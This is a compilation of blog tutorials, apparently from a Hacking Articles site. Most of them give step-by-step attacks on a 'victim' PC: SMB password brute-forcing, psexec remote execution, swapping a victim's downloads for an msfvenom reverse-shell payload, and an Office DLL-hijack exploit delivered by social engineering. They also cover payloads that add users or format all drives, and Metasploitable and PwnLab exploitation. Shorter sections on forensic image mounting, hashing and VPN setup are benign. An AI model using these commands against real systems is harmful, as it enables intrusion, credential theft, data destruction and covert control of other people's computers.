Hacking Articles|Raj Chandel's Blog

Previously we have learned all about the port SMB and how to identify its working on the remote host. To read that click here

In this article, we will learn how to gain control over our victim's PC through SMB Port. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

SMB Login Check Scanner

This module will test a SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Once the metasploit opens type:

use auxiliary/scanner/smb/smb_login

msf exploit (smb_login)>set user_file /root/Desktop/user.txt

msf exploit (smb_login)>set set pass_file /root/Desktop/pass.txt

msf exploit (smb_login)>set set rhost 192.168.0.104

msf exploit (smb_login)>set set rport 445

msf exploit (smb_login)>set exploit

Here,

auxiliary/scanner/smb/smb_login --> is a module we will use to attempt to login

/root/Desktop/user.txt --> is the path of text file which is the resident of all the possible usernames.

/root/Desktop/pass.txt --> is the path of text file in which all the possible passwords resides.

Once the commands are executed as you can see in the above image that it will start applying the dictionary attack and so you will have the right username and password in no time.

xHydra

This is the graphical version to apply dictionary attack via SMB port to hack a system. For this method to work:

Open xHydra in your kali. And select Single Target option and their give the IP of your victim PC. And select smb in box against Protocol option and give the port number 445 against the port option.

Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.

Hydra

This is one command method and works efficiently with not much work. This method works in the terminal of kali. Therefore, open the terminal in your kali and type:

hydra -l raj -P /root/Desktop/pass.txt 192.168.0.104 smb

Here,

-l -->

-P --> is to denote the path of password

/root/Desktop/pass.txt --> path of password file

And so, with just the working of one command we have password and username of our victim.

Ncrack

This too is a one command method which also works in terminal of kali. Go to your terminal and type:

ncrack -user raj -P /root/Desktop/pass.txt 192.168.0.104:445

Here,

-user --> denotes the username

raj --> is the username

-P --> denotes password file's path

/root/Desktop/pass.txt --> is the path of password file

445 --> is the port number

And so, with little work we can attain the password and username of our victim's PC. Hence, all the methods to hack a system through SMB port which is used for file sharing

To understand what is SMB protocol, click here

To know how collect username and passwords to your remote host via SMB protocol, click here

In this article, we will learn how to exploit your remote PC once you have collected username and password to your victim's PC. There are four ways to do so and they all are listed below:

Microsoft Windows Authenticated User Code Execution

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set rhost 192.168.0.104

msf exploit(psexec) > set rport 445

msf exploit(psexec) > set smbuser administrator

msf exploit(psexec) > set smbpass Ignite@123

msf exploit(psexec) > exploit

Here,

rhost --> IP of victim PC

rport --> port through which we are attacking

smbuser --> username

smbpass --> password

Once the commands run you will gain a meterpreter session of your victim's PC and so you can access it as you want.

Microsoft Windows Authenticated Powershell Command Execution

This module uses a valid administrator username and password to execute a powershell payload using a similar technique to the "psexec" utility provided by SysInternals. The payload is encoded in base64 and executed from the commandline using the –encoded command flag. Using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature based detection. A persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the psh payload has been reduced in size and wrapped in a powershell invocation which hides the window entirely.

msf > use exploit/windows/smb/psexec_psh

msf exploit(psexec_psh) > set rhost 192.168.0.104

msf exploit(psexec_psh) > set rport 445

msf exploit(psexec_psh) > set smbuser administrator

msf exploit(psexec_psh) > set smbpass Ignite@123

msf exploit(psexec_psh) > exploit

Once again as the commands run you will gain a meterpreter sesion of victim's PC. And therefore, you can do as you desire.

Atelier Web Remote Commander

This is graphical software that let us gain control of victim's PC that too quite easily.

Once you have open the software give the IP address of your victim's PC in remote host box along with the username and password in their respective boxes. And then click on connect; the whole victim's PC's screen will appear on your Desktop and you will have pretty good view of what your victim is doing.

Psexec.exe

Psexec.exe is software that helps us to access other computers in a network. This software directly takes us to the shell of the remote PC with advantage of doing nothing manually. Download this software from --> http://download.sysinternals.com/files/PSTools.zip.

Unzip the file once you have downloaded it. Go to you command prompt and type:

\\192.168.0.106 -u administrator -p Ignite@123 cmd

Here,

192.168.0.106 --> is the IP of remoste host

-u --> denotes username

-p --> denotes password

cmd --> to enter victim's command prompt

In Forensic, to investigate a hard drive or disks we always make a forensic image. A Forensic Image is a forensically sound and complete copy of a hard drive or other digital media, generally intended for use as evidence. Copies include unallocated space, slack space, and boot record. Many computer forensic programs, especially the all-in-one suites, use their own file formats to store information. These images are stored in a format of RAW file or AFF or E01.

RAW Image Format: This format is a RAW bit-by-bit copy of the original. It is often accompanied by Meta data stored in separate formats. This Image Format is most common used and is read by every Forensic tool in the industry.

Once the RAW image is created, it can't be read unless it is mounted by a tool. Mount is the process that will take the raw logical image and mount it onto a specified directory of choice to be able to examine the contents of that image. The image has to include be a recognizable file system as a partition. This makes invocation of the command interesting as the raw image is a physical disk image and not a specific partition of a file system.

Mount an image for a read-only view that leverages to see the content of the image exactly as the user saw it on the original drive.

There are various methods to mount a RAW file. But before we learn how to mount our RAW files, just have look on your my computer so that you can have a idea about how many drives you have before mounting a RAW file. For instance, following is the image of my computer of my PC:

Now, Let us have a look on these methods :

Forensic Tool Kit Imager

FTK Imager (version - 3.4.2) is tool introduced by Access Data which is used to preview data. It is also an imaging tool that lets us acquire in a forensically sound way. FTK helps us to create forensic images, Mount an image for a read-only view, Create hashes of files, etc and right now we will focus on its Mount function. To mount a RAW image file via FTK, first of all download FTK from --> http://accessdata.com/product-download/digital-forensics/ftk-imager-version-3.4.2

Now that FTK is downloaded and installed, open it and click on Files on the menu bar. A drop down menu will appear, from this menu click on Image Mounting.

A dialogue box will open now. Give the path of RAW file in Image File option and click on Mount button.

Once you click on Mount button your image will be mounted and you can see result in Mapped images:

OSFMount

OSFMount (version - 1.5.1015) is software by PassMark Software’s. It helps you mount your image files even your hard disk image file in windows with a drive letter. You can then analyze the disk image files further. For your original files not to be altered, the image files are mounted as read only by default. Download this software from --> http://www.osforensics.com/tools/mount-disk-images.html

Open OSFMount after the instalation is completed open it:

Go to File menu and select Mount new virtual disk option.

Dialogues will open; here give the path of your image file under the heading Image file and click on OK.

You can see in the following image that your RAW image will be mounted as a result:

Mount Image Pro

Get Data is a software development company that has launched Mount Image Pro (version - 6). It is a computer forensic tool which enables us to mount an image for forensic purpose. You can download this software from http://www.mountimage.com/

Open the software after its installation.

Go to File menu and click on Mount Image File.

A dialogue box will open and select your image file from it.

And then another dialogue box will open informing you with all the details. Click on OK.

It will further show you the progress in another dialogue box.

And as the outcome you can see that your image file will mount as shown in following image:

Now, as i had asked you to check you’re my computer before mounting the image, similarly, you can again check my computer and you will an extra drive as shown below:

In this article we will learn about that how we can change an on-going downloading file with your metasploit's payload in your victim's PC. That means if your victim is about to download an .exe file then you can change it with your payload (.exe). Hence hacking the victim without his/her knowing.

We will achieve the said with the help of Xerosploit. To know all about Xerosploit click herebut first we will make you payload using msfvenom.

Now make your msfvenom payload. Here, we have made a payload named putty as we have taken putty as an example for our practical:

Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.121 lport=8443 –f exe > /root/Desktop/putty.exe

Once your payload is created, save it on your desktop and open Xerosploit in the terminal of your kali and type Xerosploit to run it.

Once Xerosploit starts, type help command for that it will show all the basic commands to you. And then type scan and press enter so that you can see all the IP addresses in your network.

Choose you target and type its IP, so that now it has been targeted. Then again type help to see all the command your can now use.

Now type rdownload as it will help us to achieve our goal. After typing rdownload it will ask you to type run, therefore, type run next.

In the next step it will ask you to give theextension of files which you want to replace. For example we have taken .exe extension as we want to replace all the exe files that victim will download.

Then it will ask you to give it the path of the file which will replace victim's file. For instance our payload's name was putty.exe and it was reserved on Desktop so we gave path: /root/Desktop/putty.exe

After giving the path, simply press enter

Now you can see that as our victim is trying to download putty but instead our payload will be downloaded. Thus, the victim will be hacked.

Now that downloading of putty is started, it is asking us to save the downloaded file (which, for victim, is putty as he/she desired to download) and so he/she will obviously save the file.

Now that the victim's part is done, we will open metasploit through our terminal and use multi/handler exploit to obtain the session.

Therefore, open metasploit by typing msfconsole on your terminal of kali and type:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.121

set lport 8443

exploit

Once all the commands of multi/handler are executed it will give you the session of your victim as shown above.

Hence, hacking the victim in one of the genuine way.

PS Tools Kit is a collection of 13 tools developed by Mark Russinovich. These tools are command-line tool that lets you execute processes on remote systems and redirect console applications' output to the local system so that these applications appear to be running locally. All of these are special tools that are compatible with the NT windows version or later. Being a console application, these tools can work on both local computer and remote host. These tools require no manual installation of software on the remote system, and they let you specify alternative credentials to access the remote system. The "Ps" prefix in PsList relates to the fact that the standard UNIX process listing command-line tool is named "ps", so this prefix has been adopted for all the tools in order to tie them together into a suite of tools named PsTools.

You can download PSTool Kit from --> https://technet.microsoft.com/en-us/sysinternals/pstools.aspx

Listed below are all tools in the said tool kit:

· PsExec - execute processes remotely

· PsFile - shows files opened remotely

· PsGetSid - display the SID of a computer or a user

· PsInfo - list information about a system

· PsPing - measure network performance

· PsKill - kill processes by name or process ID

· PsList - list detailed information about processes

· PsLoggedOn - see who's logged on locally and via resource sharing (full source is included)

· PsLogList - dump event log records

· PsPasswd - changes account passwords

· PsService - view and control services

· PsShutdown - shuts down and optionally reboots a computer

· PsSuspend - suspends processes

Let us now learn how we will use these through command prompt one bye one

Firstly, let us open PSTool Kit and to do so open your command prompt and open PSTool kit using cd command as shown below :

Once you have open PSTool kit, run dir command so that you can see the list of al tools.

Now, we run a command that will help us use PSGetsid tool in the Tool Kit. The command is:

PSGetsidc64.exe \\192.168.1.104 -u administrator -p Ignite@123

Here,

192.168.1.104 --> our victim's IP

-u --> denotes username

Administrator --> username

-p --> denotes password

Ignite@123 --> password

Executing these commands informs us about the SID of our victim's PC.

Next, we will learn about psinfo.exe tool which gives us all the necessary information of the remote PC. To make this tool work type:

psinfo.exe \\192.168.1.104 -u administrator -p Ignite@123

After this command has been run, it will give you the information as you can see above.

Moving forward, we will now make psfile tool work by typing the following command:

psfile64.exe \\192.168.1.104 -u administrator -p Ignite@123

Execution of this command will help us to see every file and directories that are remotely open on the PC of victim.

Our next tool is pslist and to make it work type:

pslist64.exe \\192.168.1.104 -u administrator -p Ignite@123

This command lets us see the list of all the files on our remote PC as seen above.

Our next command is Psservice.exe which lets us know about all the services running on our victims' PC. The command is:

PsService64.exe \\192.168.1.104 -u administrator -p Ignite@123

You can result in the above pic.

One of these tools helps us to see the logs of victim PC. That tool is psloglist.exe and the command to run this tool is:

psloglist.exe \\192.168.1.104 -u administrator -p Ignite@123

So, like this our command is successful as we have our desired result.

Now, pspasswd64.exe is the most important tool as it lets us to change the password of a PC. And the command to achieve this is:

pspasswd64.exe \\192.168.1.104 -u administrator -p ignite@123 administrator forever

Here,

192.168.1.104 --> our victim's IP

-u --> denotes username

Administrator --> username

-p --> denotes password

Ignite@123 --> password

Administrator --> username (which we have to give again to specify that which user's password we want to change)

This can successfully change the password as shown in above image.

Another important tool is PsExec64.exe which takes us directly in the shell of victim's PC. Its command is:

PsExec64.exe \\192.168.1.104 -u administrator -p forever cmd

Lastly our next tool helps us to shutdown remote PC. And for that just type:

psshutdown.exe \\192.168.1.104 -u administrator -p forever

And as shown in the image above the remote PC will shutdown in 20 seconds.

So, these were tools in the PSTool kit and the commands to run them. These tools make our work alot easy and come in handy.

PS --> If you come across such dialogue box then always click on AGREE or else the above commands will not work. The image of dialogue box is shown below:

Anti-metasploit is an article to know about how can you detect if you are hacked by someone through metasploit or not. Today, most of the time we stumble upon the ways about how we can be hacked or how to hack someobe but no one tells you that how to detect if you are hacked.

So, therefore, in this article we will learn how to detect of you are hacked someone through metasploit. And to this there are two tools :

· Antipwny

· Antimeter

Both of these tools will help us to acheive our goal. These tools help you kill the meterpreter session that your hacker has gained. You can download these tools from --> http://www88.zippyshare.com/v/t6FjCuTR/file.html

Antipwny

When you will double click on the software, a daiogue box will open and it will show the meterpreter file running in your computer as show :

Now, right clickon the process and select kill process option.

And so you can detect the file and stop it too in just two simple steps.

Antimeter

When you open this software, it will scan the whole computer and it show the virus containing file. Also, it will ask you to kill the process or not. So, you type y for yes and the process will die.

Thus, the ways to detect if you have been hacked. These tools does not only allow us to detect the file but helps us to kill it also that too in two simple steps. When the steps are completed your hacker will loose the session making you safe and secure. So go on and raise your head against these exploiting hackers.

Multiple DLL side loading vulnerabilities were found in various COM components. These issues can be exploited by loading various these components as an embedded OLE object. When we instantiate a vulnerable object, Windows will try to load one or more DLLs from the current working directory. If an attacker convinces the victim to open a specially crafted (Office) document from a directory also containing the attacker's DLL file, it is possible to execute arbitrary code with the privileges of the target user. This can potentially result in the attacker taking complete control of the affected system.

Exploit Targets

MS Office 2007

MS Office 2010

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/office_ole_multiple_dll_hijack

msf exploit (office_ole_multiple_dll_hijack)>set payload windows/meterpreter/reverse_tcp

msf exploit (office_ole_multiple_dll_hijack)>set lhost 192.168.0.105 (IP of Local Host)

msf exploit (office_ole_multiple_dll_hijack)>exploit

After we successfully generate the malicious dll and ppsx File, it will stored on your local computer

/root/.msf4/local

COMServices.ppsxis the file that you will zip and send to victim using various Social Engineering Technique that we have studied in previous articles.

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.105

exploit

Now send your malicious PPT files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

Cryptography is conversion of plain readable text into unreadable form. In cryptography first the data is converted into cipher text (that is encryption) and then the cipher text is converted back into readable form (that is decryption). Cryptography basically works on the concept of encryption and decryption. Encryption and decryption should not be confused with encoding and decoding, in which data is converted from one form to another but is not deliberately altered so as to conceal its content. Encryption is achieved through the algorithms. These algorithms are works with logic, mathematic calculations and its complexities.

Hash Function is most important function in Cryptography. A hash means a 1 to 1 relationship between data. This is a common data type in languages, although sometimes it’s called a dictionary. A hash algorithm is a way to take an input and always have the same output, otherwise known as a 1 to 1 function. An ideal hash function is when this same process always yields a unique output. So you can tell someone, here is a file, and here is its md5 hash. If the file has been corrupted during then the md5 hash will be a different value.

In practice, a hash function will always produce a value of the same size, for instance md5 () is will always return 128bits no matter the size of the input. This makes a 1 to 1 relationship impossible. A cryptographic hash function takes extra precautions in making it difficult to produce 2 different inputs with the same output, this is called a collision. It also makes it difficult to reverse the function. Hash functions are used for password storage because if an attacker where to obtain the password's hash then it forces the attacker to break the hash before he can use it to login. To break hashes, attackers will take a word list or an English dictionary and find all of the corresponding hash values and then iterate though the list for each password looking for a match.

md5 (), sha0 and sha1 () are all vulnerable to a hash collision attacks and should never be used for anything security related. Instead any member of the sha-2 family, such as sha-256 should be used.

To calculate Hash Value, we will use Hash Calculator. Install Hash Calculator from --> http://www.slavasoft.com/hashcalc/

Hash function plays major role in hacking/forensic world because it helps us to know whether a particular file has changed or not. You can also calculate hash value of your computer and know if anyone has made any kind of changes.

To calculate hash value open Hash Calculator.

Now browsethe file of which you want to calculate the hash value. And click onCalculate.

After clicking on calculate it will give too hash values using four different hashing algorithms i.e MD5, SHA1, RIPEMD160, CRC32. You can check other boxes too if you want to use those algorithms to calculate hash value.

This way Hash calculator helps us to know the hash value. Now if there are any changes made in this file, the hash value will change too.

Once I calculated the hash value above i made some changes in the file and calculated the hash value again with the same method and as a result the hash value was changed.

Now, we have two hash values. Let us compare both of these values of MD5. The value of first file is 1110808875326e25dl93e4ee096afaf1 and the value of other file is fb9d53883f302d78c978a583e8a85.

Seeing these two values of MD5 of the same file we can conclude that some changes are made. Because even slightest difference will change the hash value.

But now the main question is how to detect this change because a file can be of 1TB too. Also imagine that you are sending a harddisk full of important documents to someone and there is a huge possibility that someone can bribe the sender and make changes in your documents. So how can you detect these changes?

The answer is very simple --> Compare it! This tool helps us achieve our goal which is to detect the change.

Download Compare it! From -->http://www.grigsoft.com/wincmp3.htm

Open Compare it!

Click fileand a drop menu will appear. Select compare files option.

A Dialogue boxwill open which will ask you to choose the files that you want to compare. Click on Browse button and select your file. And click on Open.

It will show you the changes by highlighting them with green color and the red color will tell the exact change as shown below:

So, in such way you can protect your sensitive data and detect the crime done too.

Ordinarily small things have no use but whenever it comes up to their greater relevance then at certain point of time it has a universalized impact and can create a complex situation. And this article is about some simple payloads that can help us to muddle with our victim. Hence, leaving a mark behind.

Moreover metasploit is not about hacking but it’s also about hacking in style. There are a lot of payloads that are too good to not to use. These payloads are like small droplets in an ocean but still they matter and there are only handful of people who about these payloads. Also so far we have only learnt about hardcore metasploit but let’s see what more cools things it has to show us.

Add User

Moving forward, let us learn how to make such payloads, open metasploit and use windows/adduser payload. This payload lets you create another user in your victim's PC. The commands are:

use windows/adduser

set user raaz

set pass Ignite@123

set wmic true

generate -t exe -f /root/Desktop/user.exe

With the execution of above command, a new user will be created in your victim's PC. And you can go to the shell of your victim's PC and see the result. And to see the user’s type:

net user

Message Box

Another payload is windows/messagebox. This payload makes a pop-up message appear on victim's PC. The message can be anything you want along with title. To create this payload again open metasploit and use windows/messagebox. The commands are:

use windows/messagebox

set text you have been hacked

set tittle Important Message

generate -t exe -f /root/Desktop/message.exe

And your payload is created. When you will send it and once the victim will open it then a pop-up message box will appear displaying your message like the following one:

Our next payload is windows/format_all_drives. This payload formats any desired drive. The commands to create this payload are :

use windows/format_all_drives

set vlomelabel 3

generate -t exe -f /root/Desktop/format.exe

When the payload is sent and opened, it formats their drive.

Speak

Another such payload is speak_pwned. This payload is a one-line command payload which creates an audio saying "you have been pawned" and now when the victim will open it then this audio will be played for him/her. And it's command is :

generate -t exe -f /root/Desktop/speak.exe

So that is how you can use different payloads to mess with your victim. Also you can create this payload and keep it safe with you so that you can use it whenever you want. And please note that all these payloads are post payloads to make these work you need to first hack your victim.

This way even the smaller things will make a difference; after all even a pawn can kill the king. And most importantly, once you are done with your victim you can leave him/her a souvenir.

Many people have described Shodan as a search engine for hackers, and have even called it "the world's most dangerous search engine". It was developed by John Matherly in 2009, and unlike other search engines, it looks for specific information that can be invaluable to hackers. John Matherly is an Inernet Cartographer, hence the shodan.

Shodan is a type of search engine that allows users to search for Internet-connected devices and explicit website information such as the type of software running on a particular system and local anonymous FTP servers. Shodan can be used much in the same way as Google, but indexes information based on banner content, which is meta-data that servers send back to hosting clients. For the best results, Shodan searches should be executed using a series of filters in a string format.

So in conclusion we can say that, Shodan is a search engine for finding specific devices, and device types, that exist online. It is like an internet map that lets us see which device is connected to which or ports are open on a specific device or what operating system a certain system is using, etc. Rather than to locate specific content on a particular search term, SHODAN is designed to help the user find specific nodes (desktops, servers, routers, switches, etc.) with specific content in their banners.

What Shodan can do?

Shodan pulls service banners from servers and devices on the web, mostly port 80, but also ports 21 (ftp), 22 (SSH), 23 (telnet), 161 (SNMP), and 5060 (SIP). Since almost every new device now has a web interface (maybe even your refrigerator) to ease remote management, we can access innumerable web-enabled servers, network devices, home security systems, etc. Shodan can find us webcams, traffic signals, video projectors, routers, home heating systems, and SCADA systems that, for instance, control nuclear power plants and electrical grids. If it has a web interface, Shodan can find it! Although many of these systems communicate over port 80 using HTTP, many use telnet or other protocols over other ports. Keep that in mind when trying to connect to them.

How to use Shodan?

Understanding shodan is very important at first you might find it complex but once yu get to know it you will find it very handy in use and very resourcefull too. So, now let us learn how to work with fasinating search engine. To use shodan to your advantage you have to first register to it.

Follow the steps to register. After registration a link will be sent to your e-mail ID for your activation of account on Shodan. Once your account is activated login to Shodan and now that you are logged in you are free to search anything.

Here are some examples for which you can use shodan to search up the things you want.

Webcam

When you search for webcam, it will show you all the webcam present in the world. It will show the results as shown in the image below :

Traffic Signals

Seaching about traffic signals or traffic signaks camera then it will show you all the traffic survallaince camera present.

Cisco

Searching about cisco will show you all the cisco routers in the world but you can search them by country. Like, here, i have found cisco routers in India and result is below image :

Scada

You can also search about Scada and you will get its information arround the whole world as shown :

netcam

Shodan can also show you about all the netcams in world and you can access them too with your hacking skills.

GPS

Shodan even lets you find all the GPS devices all over the world and for this you just have to type gps in the search box.

Port

Not only the devices but it can help find which port is open in which device. For example I have here searched port : 1723. Now we all know this port is used for VPN so through this we can know which device is using VPN as shown in image below :

When you search for port : 3389 it will show the operating system used by the device too which can be very useful.

This is how Shodan is useful for hackers as it gives all the information necessary to collect that too all over the world. And so you can manipulate this information as you desire.

You just need to follow the basic steps for configuring a remote access virtual private network (VPN) server using Server Manager, the Add Roles Wizard, and the Routing and Remote Access Server Setup Wizard. After you finish configuring a basic remote access VPN server, you can perform additional configuration tasks on client depending on the way you want to use the remote access VPN server.

Start -> Administrative Tools -> Server Manager. Click Add Roles

This wizard helps you install roll on your server, click on next to continue

Check the status of “Network Policy Server” under Role Services and click on next.

Network policy and access services provides Network Policy server (NPS), Routing and Remote Access (RRAS), Health Registration Authority (HRA), and Host Credential Authorization Protocol (HCAP) ,which help safeguard the health and security of your network.

Read the requirements and click“Next” to continue.

On the following screen “Select Role Services” for Network Policy and Access Service, place a check mark on Routing and Remote Access Services and make sure “Remote Access Service” and “Routing” are selected as well. Click next to continue.

To install following role services for Network Policy and Access Service click on Install.

This show the summary of Remote Access services and Routing were installed successfully. Once the installation finishes, click close to end the wizard.

Till here I have completed installation of VPN in server.

To complete configuration in Routing and Remote Access follow these step.

Start -> Administrative Tools ->Routing and Remote Access

In the console that opens, right click your server name and right click on “Configure and Enable Routing and Remote Access“this configures Routing and Remote Access on the selected server.

In the Wizard you can enable any of following combinations of services. I will choose Custom Configuration for my server and click on Next.

Next is Routing and Remote Access server setup wizard in which I am going to decide which type of access should be allows to client to access server network.

You can configure the selected services in the Routing and Remote Access console. I am selecting the Check Box VPN access service on this server and click on next to continue

Now you have successfully completed the task of VPN access service in your server, to close this wizard click on finish.

Now you will get the dialog box which shows message that Routing and Remote Access service is ready to use. So click on Start Service.

Once the process is finished, and you are back on the main Server Manager window, routing and remote access should now be up and running.

Once you have successfully configuration of Routing and Remote, the administrator will select the desire user and give privilege to access the server through VPN connection for connecting client from different location.

Start -> Administrative Tools -> Active Directory Users and Computers -> Right Click the properties of an user

Click on the Dial-In tab and under “Network Access Permission” select Allow Access. Click on Apply and Ok to finish. Only selected client will be able to connect with server network through VPN using different network.

This was first phase of VPN configuration on server-side performs by administrator.

SETUP VPN CONNECTION FOR CLIENT ON WINDOWS 7

Setting up a client connection to a VPN network is very similar to setting up an old-fashioned Dial-Up connection through a phone line. You need to enter a server address (hostname or IP), user and password. Once connected, this system will receive an IP address within the VPN network, so you’ll be able to access it from any other machines also connected to the same VPN network.

Click on the Start -> Control Panel ->Network and Internet -> Network and Sharing Center

Change your network settings click on setup a new connection or network option, this contains different types of network connection options like broadband, dial-up, VPN or set up a router or access point.

Here you can many other options as I told, I will choose connect to a workplace to set a dial-up or VPN connections to your workplace. This option will set the connection to a workplace or say to our server for the client.

Now you will see next wizard for connect to workplace, which will ask for type of connection through which you will connect to your workplace or server.

My option will be use my internet connection (VPN) and the will be established using internet.

Now for connecting network you must aware of IP address of workplace or say server. 192.168.0.106 it is the IP of my windows server 2008 r2 having VPN setup and configuration ,so I have mention this IP in Internet Address for connection.

Now I had set privilege for user pentest to Allow Access for VPN connection. When you will try to connect it will ask for your credentials for authentication. Client will enter his usernameand password for establishing connection and click on connect.

When given credential will be found authorized, it will allow client to connect with workplace and provide VPN connection.

This is unshared and secure connection over internet between client and server for sharing data in a transparent medium

To ensure that you have successful VPN connection open your command promot and type ipconfig this show another IP over LAN.

My IP is 192.168.0.104 under PPP adapter VPN connection, which will be used for login in server to access network and share data, as I am also having my LAN IP 192.168.0.105. This shows my VPN connection is established successfully

Metasploitable is a voluntarily created vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities Based virtual machine which helps us to conduct security training, test security tools, and practice common penetration testing techniques. The VM will run on any recent VMware products and other visualization technologies such as

VirtualBox. You can download metasploitable from--> https://www.vulnhub.com/entry/metasploitable-2,29/

Metasploit table is an exploitable framework which help us to improve our skills and also help use to use every port to our advantage as we all know that ports and protocols are the foundation of hacking so, therefore, the more you can take benefit off of the victim.

In this we will walk through the whole concept of metasploitable including how to install it and how to hack it step by step. We will take all the ports one by one which re vulnerable and try to exploit them. So, firstly you have to download metasploit from the above link. After the downloading is complete open VMware and click on Open a virtual machine.

Locate the VMware image of metasploitable that you just downloaded and click on OK.

After clicking on OK the metasploitable will open in virtual machine and to run it just click on Power on this virtual machine and it will run your metasploitable.

On the verge of getting started it will ask you for username and password. Now, by default the username and passwords are: msfadmin and msfadmin respectively. Once you enter username and password your metasploitable will start.

Now that our vulnerable Linux machine is running and we can type the ifconfig command to retrieve the IP address

Now for penetration testing on the metasploitable go to the terminal of your Kali Linux and scan the IP of metasploitable through nmap so that we can which ports are open and this type:

nmap -sV 192.168.1.106

Due to the nmap command we can see which port is open and which service is going on which port, therefore, we can start our attack one by one to every vulnerable port. So, first we will attack on vsftpd2.3.4. As we know that this version is vulnerable, so let us exploit it. For this, open metasploit and type:

search vsftpd 2.3.4

Typing the above command will show the exploits that will help you in attack the said version. So further type:

use exploit/unix/ftp/vsftpd_234_backdoor

set rhost 192.168.1.106

set rport 21

exploit

Once your attack is executed, you will reach in the shell of the metasploitable and so now you can do as you deserve.

Now, we will exploit ssh which works on port number 22. There is already existing exploit for this port. It will help us to apply dictionary attack to crack the password of metasploitable and so we will use it as :

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.1.106

set rport 22

set user_file /root/Desktop/user.txt

set pass_file /root/Desktop/pass.txt

exploit

As you can see, after the execution of the file it will start matching all the username with the passwords to find the correct one. And in the end you will have your password along with the username.

Now we can use that password to the shell of metasploitable and for this just got to the terminal of Kali and type:

ssh msfadmin@192.168.1.106

Here,

ssh --> is the service through which we are exploiting

msfadmin --> is the password

192.168.1.106 --> is the victim's IP address

Upon execution you can see that you will automatically enter its shell.

Now, we will try and attack via telnet which works on port 23. This port will also help us to find password first and then we can enter its shell. So, for this type:

use auxiliary/scanner/telnet/telnet_login

set rhosts 192.168.1.106

set rport 23

set user_file /root/Desktop/user.txt

set pass_file /root/Desktop/pass.txt

exploit

Similarly, as ssh, it will also start dictionary attack and step by step it will find the correct password. Now that you have the password you can log on to metasploitable.

telnet 192.168.1.106

After typing so, it will ask you for the username and password and once you enter these you will enter the metasploitable as shown below:

Now we will try to exploit the port number 80 on which http services run. For this too there is a pre-installed exploit in metasploit and to exercise the said exploit type:

use exploit/multi/http/php_cgi_arg_injection

set rhost 192.168.1.106

set rport 80

exploit

After the execution you will enter a meterpreter session of metasploitable as shown.

Next we will try to exploit the samba service that is going on the port number 139. For that we will use the following exploit:

use exploit/multi/samba/usermap_script

set rhost 192.168.1.106

set rport 139

exploit

The execution of this will take you the shell session of metasploit that means you will reach the shell of metasploit.

Now, we will use the following exploit:

use exploit/multi/misc/java_rmi_server

set rhost 192.168.1.106

set rport 1899

exploit

Again, after you hit enter button on your keyboard you will have a meterpreter session.

The next exploit is:

use exploit/linux/postgres/postgres_payload

set rhost 192.168.1.106

set rport 5432

exploit

Once the command is executed you will enter the meterpreter session as shown above.

The exploit that use is related to unreal ircd and to search its exploit type :

search Unreal ircd

And the result will be exploits which will help you to attack the victim. As you can see there are three exploits and we will use the latest one.

To the exploit type:

use exploit/unix/irc/unreal_ircd_3281_backdoor

set rhost 192.168.1.106

set rport 6667

exploit

In this article we will walkthrough a root2boot penetration testing challenge i.e PwnLab. PwbLab is a vulnerbale framework, based on the concept of CTF (capture the flag), with a bit of security which is a little complicated to bypass. But it’s not impossible. So, let us learn how we can get its access.

Download From Here

Now to start let us, firstly, consider that we do not know the IP of the PwnLab, therefore search for the IP address before hand and for that there is a command that shows us all the IP's present in our network, so go to the terminal of you Kali and type :

netdiscover

Target IP = 192.168.0.105

And to know that we start our penetration testing. So, first, we will now scan with nmap, we will apply an aggressive scan as it gives detailed information and is fast. The command is :

nmap -A 192.168.0.105

We have the result of scanning and as you can see there are only three ports open and they are: 80, 111, 3306.

Our target IP is 192.168.0.105 as its MAC Vendor is VMware. It is our best shot but also to be sure let us check this IP on our browser. We can crosscheck it from our browser as port number 80 is opened i.e it can open in browser. In the browser we can see that PwnLab has three pages: home, login and upload. To enter the server we have to upload our code into it and for we must know username and password.

As we need to know about username and password, we will use nikto command to find out the file which is storing them. Nikto helps us to know all the file names and the data they are containing. And the command to for this is:

nikto -h 192.168.0.105

As you can see /config.php: PHP Config file may contain database IDs and password is the file that has username and passwords. Now that we know the file name we can use curl command to find out the data of the file.

Curl is a computer software project providing a library and command-line tool for transferring data using various protocols. The cURL project produces two products, libcurl and cURL. It was first released in 1997. The name originally stood for "see URL".

And the curl comand is :

curl http://192.168.0.105/index.php?page=php://filter/convert.base64-encode/resourse=config

And the highlighted part into he above image is our result and has the information about username and passwords. But note that the information is in base64 code which we will have to decode in order to read it.

And to decode it we will use HackBar. HackBar is an add-on of Mozilla that contains various functions but the most important one is that it helps us to encode and decode base64 codes.

To decode copy the string and go to hackbar and click on encoding option. A drop down menu will appear, now select decode option.

A dialog box will open, paste the copied string on the text box and click on OK.

The decoded result will appear in your hackbar in a readable form. And this way you will have your username and password.

So, the username is root and password is H4u%QJ_H99.

Now we use sql command to see the username and passwords. And the sql command is:

mysql -h 192.168.0.105 -u root -p Users

After typing the command it ask the password, so here enter the decoded password and press enter.

And so, you will have the usernames and password as in this case the usernames are kent, mike, kane with their passwords. These passwords are in base64 code and to decode it use the hackbar as we used earlier. Also shown below:

And like this we will have our password.

Now that we have our username and password, we need to create a php file that we will upload. This raw file we will make through msfvenom. And the command is:

